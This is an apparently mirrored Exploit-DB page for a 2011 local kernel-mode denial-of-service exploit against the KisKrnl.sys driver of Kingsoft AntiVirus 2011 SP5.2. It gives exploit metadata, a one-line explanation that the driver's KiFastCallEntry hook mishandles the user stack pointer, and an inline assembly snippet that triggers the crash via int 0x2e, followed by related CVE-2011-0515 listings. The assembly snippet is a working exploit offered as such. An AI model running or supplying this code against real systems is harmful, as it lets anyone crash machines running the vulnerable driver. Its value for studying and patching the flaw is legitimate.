Lucene search
MJ0011EDB-ID:15998HistoryJan 16, 2011 - 12:00 a.m.
Kingsoft AntiVirus 2011 SP5.2 'KisKrnl.sys' 2011.1.13.89 - Local Kernel Mode Denial of Service
2011-01-1600:00:00
MJ0011
www.exploit-db.com
17
AI Score
7.4
Confidence
Low
# Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys <= 2011.1.13.89 Local Kernel Mode D.O.S Exploit
# Date: 2011-1-16
# Author: MJ0011
# Software Link: http://cd001.www.duba.net/duba/install/2011/once/KAV110114_DOWN_9_13.exe
# Version: KingSoft AntiVirus 2011 SP5.2 with KisKrnl.sys <=2011.1.13.89
# Tested on: Windows XP SP3
DETAILS:
KisKrnl.sys hook the kernel function KiFastCallEntry , but is not correctly handle user stack pointer
EXPLOIT CODE:
__asm
{
mov edx , 0x80000000
mov eax , 0x101 ;id of NtTerminateProcess under Windows XP
int 0x2e
}Related
openvas
openvas
Kingsoft Antivirus 'KisKrnl.sys' Driver Denial of Service Vulnerability
2011-02-01 00:00:00
Kingsoft Antivirus 'KisKrnl.sys' Driver Denial of Service Vulnerability
2011-02-01 00:00:00
cve
cve
CVE-2011-0515
2011-01-20 19:00:11
cvelist
cvelist
CVE-2011-0515
2011-01-20 18:00:00
prion
prion
Denial of service
2011-01-20 19:00:00
nvd
nvd
CVE-2011-0515
2011-01-20 19:00:11